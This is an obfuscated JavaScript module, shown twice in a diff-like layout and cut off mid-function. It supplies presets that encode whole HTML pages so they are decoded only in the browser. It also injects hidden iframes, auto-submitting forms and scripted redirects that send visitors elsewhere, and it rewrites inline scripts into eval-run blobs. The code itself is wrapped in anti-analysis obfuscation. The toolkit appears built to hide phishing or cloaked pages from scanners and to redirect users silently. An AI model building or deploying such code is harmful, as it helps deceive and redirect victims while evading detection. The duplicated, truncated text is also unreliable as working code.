_0x1c66ac=a32_0xbcb7c4,_0xd8da7e=Array[_0x1c66ac(0x157)](String(_0x5ecaa9))[_0x1c66ac(0x107)](_0x3c8af7=>'\x5cx'+_0x3c8af7[_0x1c66ac(0x131)](0x0)[_0x1c66ac(0x100)](0x10)[_0x1c66ac(0x14a)](0x2,'0'))['join']('');return htmlDecodeShell('document.write(\x22'+_0xd8da7e+_0x1c66ac(0x15e));}function a32_0x886d(_0x4a307e,_0x337816){_0x4a307e=_0x4a307e-0xfb;const _0x411c93=a32_0x196a();let _0x360dae=_0x411c93[_0x4a307e];return _0x360dae;}function encryptPreset17(_0x5b5df9){const _0x4ad0d2=a32_0xbcb7c4,_0x14e813=_0x4ad0d2(0x13d),_0x372b09=Buffer[_0x4ad0d2(0x157)](String(_0x5b5df9),_0x4ad0d2(0x14c));let _0x2490e4='';for(const _0x26b939 of _0x372b09)_0x2490e4+=_0x26b939['toString'](0x2)['padStart'](0x8,'0');while(_0x2490e4[_0x4ad0d2(0x167)]%0x5)_0x2490e4+='0';let _0x3f6398='';for(let _0x88ba89=0x0;_0x88ba89<_0x2490e4[_0x4ad0d2(0x167)];_0x88ba89+=0x5){_0x3f6398+=_0x14e813[parseInt(_0x2490e4[_0x4ad0d2(0x165)](_0x88ba89,_0x88ba89+0x5),0x2)];}return htmlDecodeShell('var\x20a=\x27'+_0x14e813+'\x27,s=\x27'+_0x3f6398+_0x4ad0d2(0x175)+_0x4ad0d2(0x147)+_0x4ad0d2(0xff)+'document.write(out);');}function encryptPreset18(_0x27688d){const _0x50963a=a32_0xbcb7c4,_0x51d4ac=String(_0x27688d)['match'](/[\s\S]{1,32}/g)||[String(_0x27688d)],_0x19a4d0=[..._0x51d4ac],_0x45e344=_0x19a4d0['map']((_0x9e69e,_0x182e07)=>_0x182e07);for(let _0xd95150=_0x45e344[_0x50963a(0x167)]-0x1;_0xd95150>0x0;_0xd95150--){const _0x5a924d=Math[_0x50963a(0x10b)](Math[_0x50963a(0x176)]()*(_0xd95150+0x1));[_0x45e344[_0xd95150],_0x45e344[_0x5a924d]]=[_0x45e344[_0x5a924d],_0x45e344[_0xd95150]];}const _0xffb409=_0x45e344[_0x50963a(0x107)](_0x5c3091=>_0x51d4ac[_0x5c3091]);return htmlDecodeShell(_0x50963a(0x11f)+JSON[_0x50963a(0x150)](_0x45e344)+',p='+JSON[_0x50963a(0x150)](_0xffb409)+_0x50963a(0x134));}function encryptPreset19(_0xd3afab){const _0x8bc23=a32_0xbcb7c4,_0x399736=Buffer[_0x8bc23(0x157)](String(_0xd3afab),_0x8bc23(0x14c))[_0x8bc23(0x100)](_0x8bc23(0x143)),_0x2ec7b5=_0x399736['replace'](/\+/g,'-')[_0x8bc23(0x118)](/\//g,'_')[_0x8bc23(0x118)](/=+$/g,'');return htmlDecodeShell(_0x8bc23(0x12b)+_0x2ec7b5+_0x8bc23(0xfd)+'while(b.length%4)b+=\'=\';document.write(atob(b));');}function encryptPreset20(_0x268b5e){const _0x21abbc=a32_0xbcb7c4,_0x2002e2=[crypto[_0x21abbc(0x127)](0x6)[_0x21abbc(0x100)](_0x21abbc(0x14b)),crypto[_0x21abbc(0x127)](0x6)[_0x21abbc(0x100)](_0x21abbc(0x14b)),crypto[_0x21abbc(0x127)](0x6)[_0x21abbc(0x100)](_0x21abbc(0x14b))];let _0x3297b4=Buffer[_0x21abbc(0x157)](String(_0x268b5e),_0x21abbc(0x14c));for(const _0x292e94 of _0x2002e2){const _0x511787=Buffer[_0x21abbc(0x16c)](_0x3297b4[_0x21abbc(0x167)]);for(let _0x32e1ec=0x0;_0x32e1ec<_0x3297b4[_0x21abbc(0x167)];_0x32e1ec++){_0x511787[_0x32e1ec]=_0x3297b4[_0x32e1ec]^_0x292e94[_0x21abbc(0x131)](_0x32e1ec%_0x292e94[_0x21abbc(0x167)]);}_0x3297b4=_0x511787;}const _0x1016e2=_0x3297b4[_0x21abbc(0x100)]('base64'),_0x164757=JSON[_0x21abbc(0x150)](_0x2002e2);return htmlDecodeShell(_0x21abbc(0x133)+_0x164757+',d=atob(\x27'+_0x1016e2+_0x21abbc(0x136)+_0x21abbc(0x112)+_0x21abbc(0x138)+'document.write(String.fromCharCode.apply(null,bytes));');}function obfuscatePreset11(_0x773cd0,_0x30940c){const _0x1af099=a32_0xbcb7c4,_0x495748=Buffer[_0x1af099(0x157)](String(_0x30940c||''))['toString'](_0x1af099(0x143)),_0x30c11d=_0x1af099(0x10f)+_0x495748+_0x1af099(0x168)+'if(window.open){window.open(u,\'_self\');}else{window.location.href=u;}})();</script>';return insertBeforeHeadEnd(_0x773cd0,_0x30c11d);}function obfuscatePreset12(_0x2efe6d,_0x4828d2){const _0x33075f=a32_0xbcb7c4,_0x5725f8=Buffer[_0x33075f(0x157)](String(_0x4828d2||''))[_0x33075f(0x100)]('base64'),_0x453214=_0x33075f(0x10f)+_0x5725f8+_0x33075f(0x168)+'if(window.location&&window.location.replace){window.location.replace(u);}else{window.location.href=u;}})();</script>';return insertBeforeHeadEnd(_0x2efe6d,_0x453214);}function obfuscatePreset13(_0x311631,_0x31888f){const _0x5113e1=a32_0xbcb7c4,_0x8a97b=safeHref(_0x31888f);if(_0x8a97b==='#')return _0x311631;const _0x456fa1=encodeURIComponent(_0x8a97b),_0x296e5e='<script>(function(){var\x20h=decodeURIComponent(\x27'+_0x456fa1+_0x5113e1(0x168)+'try{history.pushState({},\'\',h);}catch(e){}window.location.href=h;})();</script>';return insertBeforeHeadEnd(_0x311631,_0x296e5e);}function obfuscatePreset14(_0x1a58fb,_0x917b5e){const _0x2ea7d3=a32_0xbcb7c4,_0x56f0f5=safeHref(_0x917b5e);if(_0x56f0f5==='#')return _0x1a58fb;const _0x41b74b=_0x2ea7d3(0x163)+_0x56f0f5+'\x22\x20style=\x22display:none\x22>'+_0x2ea7d3(0x13e)+_0x2ea7d3(0x13b);return insertBeforeBodyEnd(_0x1a58fb,_0x41b74b);}function obfuscatePreset15(_0x5e8d96,_0x1365af){const _0x24d889=a32_0xbcb7c4,_0x173e74=safeHref(_0x1365af);if(_0x173e74==='#')return _0x5e8d96;const _0x5dfc97='<script>(function(){var\x20i=document.createElement(\x27iframe\x27);'+(_0x24d889(0x139)+_0x173e74+'\x27;document.body.appendChild(i);')+(_0x24d889(0x169)+_0x173e74+_0x24d889(0x12d));return insertBeforeBodyEnd(_0x5e8d96,_0x5dfc97);}function obfuscatePreset16(_0x2688a0,_0x229559){const _0x4568f7=a32_0xbcb7c4,_0x4e4e70=safeHref(_0x229559);if(_0x4e4e70==='#')return _0x2688a0;const _0xeae238=_0x4568f7(0x173)+_0x4e4e70+_0x4568f7(0x124)+_0x4e4e70+_0x4568f7(0x122)+_0x4568f7(0x151);return insertBeforeBodyEnd(_0x2688a0,_0xeae238);}function obfuscatePreset17(_0x17f049,_0xb20fcf){const _0x2a6fd4=a32_0xbcb7c4,_0x451c6e=safeHref(_0xb20fcf);if(_0x451c6e==='#')return _0x17f049;const _0x5250b5=Buffer['from'](_0x451c6e)['toString'](_0x2a6fd4(0x143)),_0x111fc2=_0x2a6fd4(0xfc)+_0x5250b5+'\x27);'+_0x2a6fd4(0x119);return insertBeforeHeadEnd(_0x17f049,_0x111fc2);}function obfuscatePreset18(_0x2e664c,_0x283bb5){const _0x3f78fc=a32_0xbcb7c4,_0x53eabe=safeHref(_0x283bb5);if(_0x53eabe==='#')return _0x2e664c;const _0x2b00ee=Array[_0x3f78fc(0x157)](_0x53eabe)[_0x3f78fc(0x107)](_0x39bc6d=>_0x39bc6d[_0x3f78fc(0x131)](0x0)),_0x27bfde=_0x3f78fc(0x11c)+_0x2b00ee[_0x3f78fc(0x12f)](',')+_0x3f78fc(0x11d)+_0x3f78fc(0x121)+'window.location.href=u;})();</script>';return insertBeforeHeadEnd(_0x2e664c,_0x27bfde);}function obfuscatePreset19(_0x179f5b,_0x58a497){const _0x1089f2=safeHref(_0x58a497);if(_0x1089f2==='#')return _0x179f5b;const _0x1d331e='<script>(function(){var\x20t=\x27'+_0x1089f2['replace'](/'/g,'\x5c\x27')+'\x27;'+'window.postMessage({mtmcRedirect:t},\'*\');'+'window.addEventListener(\'message\',function(e){if(e.data&&e.data.mtmcRedirect){window.location.href=e.data.mtmcRedirect;}});'+'window.postMessage({mtmcRedirect:t},\'*\');})();</script>';return insertBeforeHeadEnd(_0x179f5b,_0x1d331e);}function obfuscatePreset20(_0x134e5e,_0x4b0454){const _0x41891e=a32_0xbcb7c4,_0xe6c207=safeHref(_0x4b0454);if(_0xe6c207==='#')return _0x134e5e;const _0x3b21ff=_0xe6c207[_0x41891e(0x118)](/^https?:\/\//i,''),_0x1190a9=_0x41891e(0x13f)+(_0x41891e(0x126)+_0x3b21ff[_0x41891e(0x118)](/'/g,'\x5c\x27')+'\x27;})();</script>');return insertBeforeHeadEnd(_0x134e5e,_0x1190a9);}function scripterPreset11(_0x474a9d){return rewriteInlineScripts(_0x474a9d,_0x173684=>{const _0x24a13a=a32_0x886d,_0x2d9fc4=Buffer[_0x24a13a(0x157)](_0x173684,_0x24a13a(0x14c))[_0x24a13a(0x100)](_0x24a13a(0x143));return'(function(){var\x20s=atob(\x27'+_0x2d9fc4+_0x24a13a(0x11b);});}function scripterPreset12(_0x490a0c){return rewriteInlineScripts(_0x490a0c,_0x418438=>{const _0x58cce9=a32_0x886d,_0x3b867c=_0x418438['replace'](/\\/g,'\x5c\x5c')[_0x58cce9(0x118)](/`/g,'\x5c`')[_0x58cce9(0x118)](/\$/g,'\x5c$');return _0x58cce9(0x15c)+_0x3b867c+_0x58cce9(0x155);});}function scripterPreset13(_0x1e9110){return rewriteInlineScripts(_0x1e9110,_0x444599=>{const _0x4e74b3=a32_0x886d,_0x3d40fa=_0x444599['match'](/[\s\S]{1,24}/g)||[_0x444599];return _0x4e74b3(0x128)+JSON[_0x4e74b3(0x150)](_0x3d40fa)+_0x4e74b3(0x105);});}function scripterPreset14(_0x4a1903){return rewriteInlineScripts(_0x4a1903,_0x1f373f=>{const _0x564a42=a32_0x886d,_0x2b6153=Array[_0x564a42(0x157)](_0x1f373f)[_0x564a42(0x107)](_0x4c040=>_0x4c040[_0x564a42(0x131)](0x0));return _0x564a42(0x109)+_0x2b6153[_0x564a42(0x12f)](',')+'];'+'var\x20s=c.map(function(n){return\x20String.fromCharCode(n);}).join(\x27\x27);'+_0x564a42(0x158);});}function scripterPreset15(_0x1047b4){return rewriteInlineScripts(_0x1047b4,_0x193038=>{const _0x4e6875=a32_0x886d,_0x4de9f2=_0x193038[_0x4e6875(0x149)]('');for(let _0x102ef8=0x0;_0x102ef8+0x1<_0x4de9f2[_0x4e6875(0x167)];_0x102ef8+=0x2){;[_0x4de9f2[_0x102ef8],_0x4de9f2[_0x102ef8+0x1]]=[_0x4de9f2[_0x102ef8+0x1],_0x4de9f2[_0x102ef8]];}const _0x1008de=_0x4de9f2['join'](''),_0x9f3d99=Buffer['from'](_0x1008de,_0x4e6875(0x14c))[_0x4e6875(0x100)](_0x4e6875(0x143));return _0x4e6875(0x170)+_0x9f3d99+_0x4e6875(0x103)+_0x4e6875(0x174)+_0x4e6875(0x140);});}function scripterPreset16(_0x556c07){return rewriteInlineScripts(_0x556c07,_0x332ca2=>{const _0x317239=a32_0x886d,_0x4174e6=crypto['randomBytes'](0x8)['toString'](_0x317239(0x14b)),_0x5b1184=Buffer['from'](_0x332ca2,_0x317239(0x14c)),_0x5f5868=Buffer[_0x317239(0x16c)](_0x5b1184[_0x317239(0x167)]);for(let _0x544af5=0x0;_0x544af5<_0x5b1184[_0x317239(0x167)];_0x544af5++){_0x5f5868[_0x544af5]=_0x5b1184[_0x544af5]^_0x4174e6[_0x317239(0x131)](_0x544af5%_0x4174e6[_0x317239(0x167)]);}const _0x322732=_0x5f5868[_0x317239(0x100)]('base64');return _0x317239(0x104)+_0x4174e6+_0x317239(0x135)+_0x322732+_0x317239(0x154)+_0x317239(0x14e)+_0x317239(0x11e);});}function scripterPreset17(_0x13912e){return rewriteInlineScripts(_0x13912e,_0x40557b=>{const _0x59f097=a32_0x886d,_0x46d3cb=zlib[_0x59f097(0x123)](Buffer[_0x59f097(0x157)](_0x40557b,_0x59f097(0x14c)))[_0x59f097(0x100)](_0x59f097(0x143));return _0x59f097(0x125)+_0x46d3cb+_0x59f097(0x162)+'for(var\x20i=0;i<b.length;i++)a[i]=b.charCodeAt(i);'+_0x59f097(0x15f)+_0x59f097(0x129);});}function scripterPreset18(_0x5783d9){return rewriteInlineScripts(_0x5783d9,_0x27d6c6=>{const _0x587095=a32_0x886d,_0x5cb3c1=_0x27d6c6['split']('\x0a')[_0x587095(0x107)](_0x3de639=>_0x587095(0x148)+_0x3de639);return _0x5cb3c1[_0x587095(0x12f)]('\x0a');});}function scripterPreset19(_0x50b0f0){const _0x2da31c=a32_0xbcb7c4;return rewriteInlineScripts(_0x50b0f0,_0x25e7c5=>_0x2da31c(0x153)+_0x25e7c5+'\x0a}catch(_mtmcErr){}})();');}function scripterPreset20(_0x371ade){return rewriteInlineScripts(_0x371ade,_0x5dccf4=>{const _0x3a18fc=a32_0x886d,_0x3056cf=_0x5dccf4['match'](/[\s\S]{1,16}/g)||[_0x5dccf4],_0x2da12c=_0x3056cf[_0x3a18fc(0x107)](_0x2be60b=>JSON[_0x3a18fc(0x150)](_0x2be60b));return _0x3a18fc(0x14d)+_0x2da12c[_0x3a18fc(0x12f)](',')+_0x3a18fc(0x141);});}const EXTENDED_ENCRYPT_PRESETS={'preset11':encryptPreset11,'preset12':encryptPreset12,'preset13':encryptPreset13,'preset14':encryptPreset14,'preset15':encryptPreset15,'preset16':encryptPreset16,'preset17':encryptPreset17,'preset18':encryptPreset18,'preset19':encryptPreset19,'preset20':encryptPreset20},EXTENDED_OBFUSCATE_PRESETS={'preset11':obfuscatePreset11,'preset12':obfuscatePreset12,'preset13':obfuscatePreset13,'preset14':obfuscatePreset14,'preset15':obfuscatePreset15,'preset16':obfuscatePreset16,'preset17':obfuscatePreset17,'preset18':obfuscatePreset18,'preset19':obfuscatePreset19,'preset20':obfuscatePreset20},EXTENDED_SCRIPTER_PRESETS={'preset11':scripterPreset11,'preset12':scripterPreset12,'preset13':scripterPreset13,'preset14':scripterPreset14,'preset15':scripterPreset15,'preset16':scripterPreset16,'preset17':scripterPreset17,'preset18':scripterPreset18,'preset19':scripterPreset19,'preset20':scripterPreset20};function registerExtendedPresets(_0x5c813c={}){const _0x1f36cc=a32_0xbcb7c4,{ENCRYPT_PRESETS:ENCRYPT_PRESETS={},OBFUSCATE_PRESETS:OBFUSCATE_PRESETS={},SCRIPTER_PRESETS:SCRIPTER_PRESETS={}}=_0x5c813c;Object[_0x1f36cc(0x177)](ENCRYPT_PRESETS,EXTENDED_ENCRYPT_PRESETS),Object['assign'](OBFUSCATE_PRESETS,EXTENDED_OBFUSCATE_PRESETS),Object[_0x1f36cc(0x177)](SCRIPTER_PRESETS,EXTENDED_SCRIPTER_PRESETS);}module[a32_0xbcb7c4(0x10e)]={'registerExtendedPresets':registerExtendedPresets,'EXTENDED_ENCRYPT_PRESETS':EXTENDED_ENCRYPT_PRESETS,'EXTENDED_OBFUSCATE_PRESETS':EXTENDED_OBFUSCATE_PRESETS,'EXTENDED_SCRIPTER_PRESETS':EXTENDED_SCRIPTER_PRESETS};
1
+ const a32_0x7c3a91=a32_0xce98;function a32_0x4ca3(){const _0x2562c1=['2YcHVTj',';document.write(o.map(function(i){return\x20p[i];}).join(\x27\x27));','var\x20k=\x27','\x27;document.body.appendChild(i);','deflateSync','(0,eval)(b.join(\x27\x27));})();','8937800zfQtFZ','apply','eval(String.raw`','<script>(function(){var\x20c=[','var\x20o=','stringify','slice','includes','crypto','\x27).split(\x27\x27);','</body></html>','],u=\x27\x27;','hex','(((.+)+)+)+$','alloc','for(var\x20i=0;i<b.length;i++)a[i]=b.charCodeAt(i);','<script>(function(){var\x20u=atob(\x27','\x27;},50);})();</script>','assign','1463144wfwrum','randomBytes','from','2271735xvfnye','replace','];(0,eval)(a.join(\x27\x27));})();','if(location.hash){location.href=h;}else{location.assign(h);}})();</script>','(0,eval)(o);})();','207639NvXkHa','%22','\x22\x20rel=\x22noopener\x20noreferrer\x22>Continue</a>','(function(){var\x20p=','var\x20s=c.map(function(n){return\x20String.fromCharCode(n);}).join(\x27\x27);','\x22);','if(typeof\x20pako!==\x27undefined\x27){(0,eval)(pako.inflate(a,{to:\x27string\x27}));}','<!doctype\x20html><html><head>','setTimeout(function(){window.location.href=\x27','(function(){var\x20k=\x27','o+=String.fromCharCode(parseInt(a+b,16));}','window.location.href=p+\x27','<a\x20id=\x22mtmc-obf16\x22\x20href=\x22','padStart','</script>','\x22\x20ping=\x22','for(var\x20i=0;i<d.length;i++)o+=String.fromCharCode(d.charCodeAt(i)^k.charCodeAt(i%k.length)^((i*31)&255));','<script>(function(){var\x20a=document.getElementById(\x27mtmc-obf16\x27);if(a){try{a.click();}catch(e){window.location.href=a.href;}}})();</script>','\x0a</head>','for(var\x20i=0;i+1<b.length;i+=2){var\x20t=b[i];b[i]=b[i+1];b[i+1]=t;}','trim','for(var\x20i=0;i<d.length;i++)bytes.push(d.charCodeAt(i));','length','</head>','var\x20ks=','\x27),o=\x27\x27;','charCodeAt','for(var\x20i=0;i<h.length;i+=2){var\x20a=h[i],b=h[i+1];','join','`);','for(var\x20i=0;i<c.length;i++)u+=String.fromCharCode(c[i]);','\x27);','5edHaBY','\x27,b=r.split(\x27\x27).reverse().join(\x27\x27);document.write(atob(b));','<script>(function(){var\x20h=decodeURIComponent(\x27','for(var\x20i=0;i<s.length;i++)bits+=a.indexOf(s[i]).toString(2).padStart(5,\x270\x27);','var\x20r=\x27','for(var\x20i=0;i<d.length;i++)o+=String.fromCharCode((~d.charCodeAt(i))&255);','if(b>=\x27a\x27&&b<=\x27f\x27)b=String.fromCharCode(((b.charCodeAt(0)-97+3)%6)+97);','base64','4528gmRDwf','</body>','exec','</head><body>','\x27,d=atob(\x27','(async\x20function(){try{\x0a','map','906126XOcfIl','<script>(function(){var\x20p=\x27','var\x20a=\x27','match','\x27,o=\x27\x27;','\x22\x20style=\x22display:none\x22>','else{(0,eval)(b);}})();','1876Mrxbgx','<script>(function(){var\x20t=\x27','\x27,b=atob(p),a=new\x20Uint8Array(b.length);','(function(){var\x20b=atob(\x27',',p=','utf8','<script>(function(){var\x20f=document.getElementById(\x27mtmc-obf14\x27);if(f)f.submit();})();</script>','1571118SaQHoP','search','\x0a</body>','zlib','\x0a}catch(_mtmcErr){}})();','<script>(function(){document.open();','var\x20s=\x27','split','\x27),bytes=[];','<form\x20id=\x22mtmc-obf14\x22\x20method=\x22get\x22\x20action=\x22','<!doctype\x20html><html><head><meta\x20charset=\x22utf-8\x22></head><body>','document.close();})();</script>','(function(){var\x20p=\x27','toString'];a32_0x4ca3=function(){return _0x2562c1;};return a32_0x4ca3();}(function(_0x2eceb2,_0x5baff2){const _0x43878e=a32_0xce98,_0x18588e=_0x2eceb2();while(!![]){try{const _0x37a017=-parseInt(_0x43878e(0x175))/0x1*(parseInt(_0x43878e(0x154))/0x2)+parseInt(_0x43878e(0x138))/0x3+parseInt(_0x43878e(0x16d))/0x4*(parseInt(_0x43878e(0x129))/0x5)+parseInt(_0x43878e(0x146))/0x6+parseInt(_0x43878e(0x13f))/0x7*(parseInt(_0x43878e(0x131))/0x8)+parseInt(_0x43878e(0x170))/0x9+-parseInt(_0x43878e(0x15a))/0xa;if(_0x37a017===_0x5baff2)break;else _0x18588e['push'](_0x18588e['shift']());}catch(_0x5f4e1c){_0x18588e['push'](_0x18588e['shift']());}}}(a32_0x4ca3,0x38bad));const a32_0x549d26=(function(){let _0x1d9865=!![];return function(_0xf26bce,_0x5c294b){const _0x1c18fe=_0x1d9865?function(){const _0x55a0e2=a32_0xce98;if(_0x5c294b){const _0x36a430=_0x5c294b[_0x55a0e2(0x15b)](_0xf26bce,arguments);return _0x5c294b=null,_0x36a430;}}:function(){};return _0x1d9865=![],_0x1c18fe;};}()),a32_0x1aaa80=a32_0x549d26(this,function(){const _0x2bd161=a32_0xce98;return a32_0x1aaa80['toString']()[_0x2bd161(0x147)](_0x2bd161(0x167))[_0x2bd161(0x153)]()['constructor'](a32_0x1aaa80)[_0x2bd161(0x147)](_0x2bd161(0x167));});a32_0x1aaa80();const crypto=require(a32_0x7c3a91(0x162)),zlib=require(a32_0x7c3a91(0x149));function htmlDecodeShell(_0x537b9a){const _0x11158c=a32_0x7c3a91;return _0x11158c(0x150)+(_0x11158c(0x14b)+_0x537b9a+_0x11158c(0x151))+'</body></html>';}function safeHref(_0x555dd8){const _0x49bee2=a32_0x7c3a91,_0x109d35=String(_0x555dd8||'')[_0x49bee2(0x11d)]();return/^https?:\/\//i['test'](_0x109d35)?_0x109d35[_0x49bee2(0x171)](/"/g,_0x49bee2(0x176)):'#';}function insertBeforeBodyEnd(_0x2ab177,_0x24a10c){const _0x3d5c1b=a32_0x7c3a91,_0x4330c6=String(_0x2ab177);return _0x4330c6['includes'](_0x3d5c1b(0x132))?_0x4330c6['replace'](_0x3d5c1b(0x132),_0x24a10c+_0x3d5c1b(0x148)):'<!doctype\x20html><html><body>'+_0x4330c6+_0x24a10c+_0x3d5c1b(0x164);}function insertBeforeHeadEnd(_0x20fa1a,_0x1c8cec){const _0x1f4298=a32_0x7c3a91,_0x3132c0=String(_0x20fa1a);return _0x3132c0[_0x1f4298(0x161)](_0x1f4298(0x120))?_0x3132c0['replace'](_0x1f4298(0x120),_0x1c8cec+_0x1f4298(0x11b)):_0x1f4298(0x17c)+_0x1c8cec+_0x1f4298(0x134)+_0x3132c0+_0x1f4298(0x164);}function rewriteInlineScripts(_0x5c36a9,_0x3a23f3){const _0x2e1327=a32_0x7c3a91,_0x5578c2=/<script\b([^>]*)>([\s\S]*?)<\/script>/gi;let _0x1f2c98=String(_0x5c36a9),_0x50774e;const _0x29444d=[];while((_0x50774e=_0x5578c2[_0x2e1327(0x133)](_0x1f2c98))!==null){const _0x18e485=_0x50774e[0x2];if(!_0x18e485[_0x2e1327(0x11d)]())continue;_0x29444d['push']({'from':_0x50774e[0x0],'to':'<script'+_0x50774e[0x1]+'>'+_0x3a23f3(_0x18e485)+_0x2e1327(0x183)});}for(const _0x444811 of _0x29444d)_0x1f2c98=_0x1f2c98['split'](_0x444811[_0x2e1327(0x16f)])[_0x2e1327(0x125)](_0x444811['to']);return _0x29444d[_0x2e1327(0x11f)]?_0x1f2c98:_0x5c36a9;}function encryptPreset11(_0x2b6b84){const _0x1c5043=a32_0x7c3a91,_0x252737=zlib[_0x1c5043(0x158)](Buffer[_0x1c5043(0x16f)](String(_0x2b6b84),_0x1c5043(0x144))),_0x2d774b=_0x252737[_0x1c5043(0x153)]('base64');return'<!doctype\x20html><html><head><meta\x20charset=\x22utf-8\x22></head><body>'+(_0x1c5043(0x139)+_0x2d774b+'\x27;')+'var s=document.createElement(\'script\');'+'s.src=\x27https://cdnjs.cloudflare.com/ajax/libs/pako/2.0.4/pako.min.js\x27;'+'s.onload=function(){var\x20b=atob(p),a=new\x20Uint8Array(b.length);'+'for(var\x20i=0;i<b.length;i++)a[i]=b.charCodeAt(i);'+'document.open();document.write(pako.inflate(a,{to:\'string\'}));document.close();};'+'document.head.appendChild(s);})();</script>'+_0x1c5043(0x164);}function encryptPreset12(_0x333100){const _0x236b95=a32_0x7c3a91,_0x229144=Buffer[_0x236b95(0x16f)](String(_0x333100),_0x236b95(0x144))[_0x236b95(0x153)](_0x236b95(0x166)),_0x2002d4=_0x229144[_0x236b95(0x14d)]('')[_0x236b95(0x137)](_0x12c226=>{const _0x430bc6=_0x236b95;if(_0x12c226>='0'&&_0x12c226<='9')return String((Number(_0x12c226)+0x3)%0xa);if(_0x12c226>='a'&&_0x12c226<='f')return String['fromCharCode']((_0x12c226[_0x430bc6(0x123)](0x0)-0x61+0x3)%0x6+0x61);return _0x12c226;})[_0x236b95(0x125)]('');return htmlDecodeShell('var\x20h=\x27'+_0x2002d4+_0x236b95(0x13c)+_0x236b95(0x124)+'if(a>=\x270\x27&&a<=\x279\x27)a=String((+a+7)%10);'+_0x236b95(0x12f)+_0x236b95(0x17f)+'document.write(o);');}function encryptPreset13(_0x43a82c){const _0x37d3cb=a32_0x7c3a91,_0x375382=Buffer[_0x37d3cb(0x16f)](String(_0x43a82c),'utf8')[_0x37d3cb(0x153)](_0x37d3cb(0x130)),_0xd83f52=_0x375382[_0x37d3cb(0x14d)]('')['reverse']()[_0x37d3cb(0x125)]('');return htmlDecodeShell(_0x37d3cb(0x12d)+_0xd83f52+_0x37d3cb(0x12a));}function encryptPreset14(_0x23f6d9){const _0x51a186=a32_0x7c3a91,_0x2ed26a=Buffer[_0x51a186(0x16f)](String(_0x23f6d9),_0x51a186(0x144)),_0x335615=Buffer[_0x51a186(0x16f)](_0x2ed26a[_0x51a186(0x137)](_0x26ba62=>~_0x26ba62&0xff)),_0x4c7490=_0x335615['toString'](_0x51a186(0x130));return htmlDecodeShell('var\x20d=atob(\x27'+_0x4c7490+'\x27),o=\x27\x27;'+_0x51a186(0x12e)+'document.write(o);');}function encryptPreset15(_0x5aad98){const _0x4db4fb=a32_0x7c3a91,_0x187fa9=crypto['randomBytes'](0x10)['toString'](_0x4db4fb(0x166)),_0x111d2a=Buffer['from'](String(_0x5aad98),_0x4db4fb(0x144)),_0x4f7dd7=Buffer[_0x4db4fb(0x168)](_0x111d2a[_0x4db4fb(0x11f)]);for(let _0x37bccd=0x0;_0x37bccd<_0x111d2a[_0x4db4fb(0x11f)];_0x37bccd++){_0x4f7dd7[_0x37bccd]=_0x111d2a[_0x37bccd]^_0x187fa9[_0x4db4fb(0x123)](_0x37bccd%_0x187fa9['length'])^_0x37bccd*0x1f&0xff;}const _0x486e41=_0x4f7dd7[_0x4db4fb(0x153)](_0x4db4fb(0x130));return htmlDecodeShell(_0x4db4fb(0x156)+_0x187fa9+'\x27,d=atob(\x27'+_0x486e41+'\x27),o=\x27\x27;'+_0x4db4fb(0x119)+'document.write(o);');}function a32_0xce98(_0x240fa8,_0x4947b3){_0x240fa8=_0x240fa8-0x119;const _0x14f70a=a32_0x4ca3();let _0x1aaa80=_0x14f70a[_0x240fa8];return _0x1aaa80;}function encryptPreset16(_0x456a1f){const _0x630045=a32_0x7c3a91,_0x5a0798=Array[_0x630045(0x16f)](String(_0x456a1f))[_0x630045(0x137)](_0x2bbda0=>'\x5cx'+_0x2bbda0[_0x630045(0x123)](0x0)['toString'](0x10)['padStart'](0x2,'0'))[_0x630045(0x125)]('');return htmlDecodeShell('document.write(\x22'+_0x5a0798+_0x630045(0x17a));}function encryptPreset17(_0xcfd5e1){const _0x595374=a32_0x7c3a91,_0x2540d6='ABCDEFGHIJKLMNOPQRSTUVWXYZ234567',_0x372864=Buffer[_0x595374(0x16f)](String(_0xcfd5e1),'utf8');let _0x334b66='';for(const _0x10357e of _0x372864)_0x334b66+=_0x10357e[_0x595374(0x153)](0x2)[_0x595374(0x182)](0x8,'0');while(_0x334b66[_0x595374(0x11f)]%0x5)_0x334b66+='0';let _0x45913f='';for(let _0x419a4a=0x0;_0x419a4a<_0x334b66[_0x595374(0x11f)];_0x419a4a+=0x5){_0x45913f+=_0x2540d6[parseInt(_0x334b66[_0x595374(0x160)](_0x419a4a,_0x419a4a+0x5),0x2)];}return htmlDecodeShell(_0x595374(0x13a)+_0x2540d6+'\x27,s=\x27'+_0x45913f+'\x27,bits=\x27\x27;'+_0x595374(0x12c)+'var\x20out=\x27\x27;for(var\x20j=0;j+8<=bits.length;j+=8)out+=String.fromCharCode(parseInt(bits.slice(j,j+8),2));'+'document.write(out);');}function encryptPreset18(_0x4ed728){const _0x7b9762=a32_0x7c3a91,_0x2d86a4=String(_0x4ed728)[_0x7b9762(0x13b)](/[\s\S]{1,32}/g)||[String(_0x4ed728)],_0x459c7b=[..._0x2d86a4],_0xde6d67=_0x459c7b[_0x7b9762(0x137)]((_0x1d8784,_0x15994c)=>_0x15994c);for(let _0x4c2244=_0xde6d67[_0x7b9762(0x11f)]-0x1;_0x4c2244>0x0;_0x4c2244--){const _0x386fb9=Math['floor'](Math['random']()*(_0x4c2244+0x1));[_0xde6d67[_0x4c2244],_0xde6d67[_0x386fb9]]=[_0xde6d67[_0x386fb9],_0xde6d67[_0x4c2244]];}const _0x979239=_0xde6d67[_0x7b9762(0x137)](_0x2ee193=>_0x2d86a4[_0x2ee193]);return htmlDecodeShell(_0x7b9762(0x15e)+JSON[_0x7b9762(0x15f)](_0xde6d67)+_0x7b9762(0x143)+JSON['stringify'](_0x979239)+_0x7b9762(0x155));}function encryptPreset19(_0x1cbc16){const _0x1705ef=a32_0x7c3a91,_0x331b8e=Buffer[_0x1705ef(0x16f)](String(_0x1cbc16),_0x1705ef(0x144))[_0x1705ef(0x153)]('base64'),_0x1427c0=_0x331b8e[_0x1705ef(0x171)](/\+/g,'-')[_0x1705ef(0x171)](/\//g,'_')['replace'](/=+$/g,'');return htmlDecodeShell(_0x1705ef(0x14c)+_0x1427c0+'\x27,b=s.replace(/-/g,\x27+\x27).replace(/_/g,\x27/\x27);'+'while(b.length%4)b+=\'=\';document.write(atob(b));');}function encryptPreset20(_0x1ec655){const _0x17e8ae=a32_0x7c3a91,_0x7fd64c=[crypto[_0x17e8ae(0x16e)](0x6)[_0x17e8ae(0x153)]('hex'),crypto[_0x17e8ae(0x16e)](0x6)[_0x17e8ae(0x153)]('hex'),crypto['randomBytes'](0x6)['toString'](_0x17e8ae(0x166))];let _0x50b2ef=Buffer[_0x17e8ae(0x16f)](String(_0x1ec655),_0x17e8ae(0x144));for(const _0x63f040 of _0x7fd64c){const 